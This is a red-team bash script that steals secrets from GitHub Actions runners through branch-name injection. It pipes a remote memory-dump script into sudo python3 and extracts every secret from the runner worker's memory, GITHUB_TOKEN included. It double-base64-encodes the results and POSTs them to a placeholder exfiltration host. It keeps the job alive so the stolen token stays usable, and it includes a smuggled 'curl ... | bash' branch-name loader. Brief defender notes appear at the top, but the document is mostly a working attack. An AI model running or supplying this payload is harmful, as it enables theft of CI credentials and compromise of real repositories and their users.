Universal "dump all secrets" payload for GitHub Actions workflow branch-name injection — the case where a `run:` step interpolates an attacker-controlled branch name into a shell command, so the branch name itself can carry a one-line loader for this script.
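#!/usr/bin/env bash
# Red-team payload: dump every secret held by a GitHub Actions runner and POST
# it to a collaborator host. Intended for the "branch name injection" class of
# workflow bug, where a `run:` step interpolates an attacker-controlled ref
# (e.g. ${{ github.head_ref }}) straight into a shell command.
#
# Defender notes -- what this looks like on the runner, in order:
#   * a curl to gist.githubusercontent.com piped into `sudo python3`
#   * root reads of another process's memory (the runner worker) by memdump.py
#   * an outbound POST of a double-base64 blob to a non-GitHub host
#   * a 15-minute `sleep` that keeps the job -- and its GITHUB_TOKEN -- alive
#
# Replace with your Burp Collaborator domain or similar. Keep the scheme here:
# the value is used verbatim as the URL prefix for the exfil request below.
YOUR_EXFIL="https://your-exfil-domain.com"

# Delivery via branch name. Git refnames cannot contain spaces, so the loader
# is written with brace expansion ({curl,-sSfL,...}) and ${IFS} in place of
# every space. The leading ASCII `"` closes the workflow's own quoted echo --
# it must be a plain double quote, not a typographic one:
#   'Hacked";{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
#
# Secret extraction uses the memory-dump technique from
# github.com/nikitastupin/pwnhub plus a regex that pulls every
# {"value":"...","isSecret":true} entry (GITHUB_TOKEN included) out of the
# worker process's memory.

# Linux runners only; macOS/Windows runners exit quietly with status 0.
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  # sudo: presumably needed because memdump.py reads another process's memory
  # (GitHub-hosted runners allow passwordless sudo) -- confirm against memdump.py.
  # tr -d '\0' strips NULs from the raw dump; grep -a forces text mode anyway;
  # sort -u collapses repeated copies of the same secret.
  # The result is base64-encoded twice -- likely so the plaintext values never
  # appear in the run log where GitHub's secret masking would redact them.
  B64_BLOB=$(curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py \
    | sudo python3 \
    | tr -d '\0' \
    | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' \
    | sort -u \
    | base64 -w 0 \
    | base64 -w 0)

  # Print to the run log as a second channel in case the exfil POST is blocked.
  printf '%s\n' "$B64_BLOB"

  # Exfil to the collaborator. The original built this URL as
  # https://$YOUR_EXFIL/token, which doubled the scheme because YOUR_EXFIL
  # already carries https:// -- the variable is the full prefix, use it as such.
  curl -s -d "$B64_BLOB" "${YOUR_EXFIL}/token" > /dev/null

  # Keep the job alive for 15 minutes: GITHUB_TOKEN is only valid while the job
  # runs, so this is the window in which the captured token remains usable.
  sleep 900
else
  exit 0
fi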